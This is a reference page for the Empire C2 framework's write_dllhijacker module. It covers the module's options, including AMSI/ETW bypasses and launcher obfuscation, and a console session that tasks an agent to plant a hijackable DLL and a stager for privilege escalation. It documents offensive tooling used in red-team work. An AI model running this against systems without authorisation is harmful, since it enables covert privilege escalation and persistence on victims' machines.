Write-HijackDll - Empire Module


This page contains detailed information about how to use the powershell/privesc/powerup/write_dllhijacker Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: Write-HijackDll
Module: powershell/privesc/powerup/write_dllhijacker
Source code [1]: empire/server/modules/powershell/privesc/powerup/write_dllhijacker.yaml
Source code [2]: empire/server/modules/powershell/privesc/powerup/write_dllhijacker.py
MITRE ATT&CK: T1087, T1038, T1031, T1034, T1057, T1012, S0194
Language: PowerShell
Needs admin: No
OPSEC safe: No
Background: Yes

The write_dllhijacker module writes out a hijackable .dll to the specified path along with a stager.bat that's called by the .dll. wlbsctrl.dll works well for Windows 7. The machine will need to be restarted for the privesc to work.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the write_dllhijacker module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options


This is a list of options that are required by the write_dllhijacker module:

Agent
Agent to run module on.

DllPath
The output path for the hijackable .dll.

Listener
Listener to use.

Additional Module Options


This is a list of additional options that are supported by the write_dllhijacker module:

Bypasses
Bypasses as a space separated list to be prepended to the launcher.
Default value: mattifestation etw.

Obfuscate
Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.
Default value: False.

ObfuscateCommand
The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.
Default value: Token\All\1.

OutputFunction
PowerShell's output function to use ("Out-String", "ConvertTo-Json", "ConvertTo-Csv", "ConvertTo-Html", "ConvertTo-Xml").
Default value: Out-String.
Suggested values: Out-String, ConvertTo-Json, ConvertTo-Csv, ConvertTo-Html, ConvertTo-Xml.

Proxy
Proxy to use for request (default, none, or other).
Default value: default.

ProxyCreds
Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
Default value: default.

UserAgent
User-agent string to use for the staging request (default, none, or other).
Default value: default.

Write_dllhijacker Example Usage


Here's an example of how to use the write_dllhijacker module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/privesc/powerup/write_dllhijacker

 Author       leechristensen (@tifkin_)                                           
              @harmj0y                                                            
 Background   True                                                                
 Comments     https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp  
 Description  Writes out a hijackable .dll to the specified path along with a     
              stager.bat that's called by the .dll. wlbsctrl.dll works well for   
              Windows 7. The machine will need to be restarted for the privesc to 
              work.                                                               
 Language     powershell                                                          
 Name         powershell/privesc/powerup/write_dllhijacker                        
 NeedsAdmin   False                                                               
 OpsecSafe    False                                                               
 Software     http://attack.mitre.org/software/S0194                              
 Techniques   http://attack.mitre.org/techniques/T1087                            
              http://attack.mitre.org/techniques/T1038                            
              http://attack.mitre.org/techniques/T1031                            
              http://attack.mitre.org/techniques/T1034                            
              http://attack.mitre.org/techniques/T1057                            
              http://attack.mitre.org/techniques/T1012                            


,Record Options----,--------------------,----------,-------------------------------------,
| Name             | Value              | Required | Description                         |
|------------------|--------------------|----------|-------------------------------------|
| Agent            |                    | True     | Agent to run module on.             |
|------------------|--------------------|----------|-------------------------------------|
| Bypasses         | mattifestation etw | False    | Bypasses as a space separated list  |
|                  |                    |          | to be prepended to the launcher.    |
|------------------|--------------------|----------|-------------------------------------|
| DllPath          |                    | True     | The output path for the hijackable  |
|                  |                    |          | .dll.                               |
|------------------|--------------------|----------|-------------------------------------|
| Listener         |                    | True     | Listener to use.                    |
|------------------|--------------------|----------|-------------------------------------|
| Obfuscate        | False              | False    | Switch. Obfuscate the launcher      |
|                  |                    |          | powershell code, uses the           |
|                  |                    |          | ObfuscateCommand for obfuscation    |
|                  |                    |          | types. For powershell only.         |
|------------------|--------------------|----------|-------------------------------------|
| ObfuscateCommand | Token\All\1        | False    | The Invoke-Obfuscation command to   |
|                  |                    |          | use. Only used if Obfuscate switch  |
|                  |                    |          | is True. For powershell only.       |
|------------------|--------------------|----------|-------------------------------------|
| OutputFunction   | Out-String         | False    | PowerShell's output function to use |
|                  |                    |          | ("Out-String", "ConvertTo-Json",    |
|                  |                    |          | "ConvertTo-Csv", "ConvertTo-Html",  |
|                  |                    |          | "ConvertTo-Xml").                   |
|------------------|--------------------|----------|-------------------------------------|
| Proxy            | default            | False    | Proxy to use for request (default,  |
|                  |                    |          | none, or other).                    |
|------------------|--------------------|----------|-------------------------------------|
| ProxyCreds       | default            | False    | Proxy credentials                   |
|                  |                    |          | ([domain\]username:password) to use |
|                  |                    |          | for request (default, none, or      |
|                  |                    |          | other).                             |
|------------------|--------------------|----------|-------------------------------------|
| UserAgent        | default            | False    | User-agent string to use for the    |
|                  |                    |          | staging request (default, none, or  |
|                  |                    |          | other).                             |
'------------------'--------------------'----------'-------------------------------------'

(Empire: usemodule/powershell/privesc/powerup/write_dllhijacker) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/privesc/powerup/write_dllhijacker) > set DllPath value
[*] Set DllPath to value
(Empire: usemodule/powershell/privesc/powerup/write_dllhijacker) > set Listener listener1
[*] Set Listener to listener1
(Empire: usemodule/powershell/privesc/powerup/write_dllhijacker) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Authors


References


See Also


Check also the following modules related to this module:

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.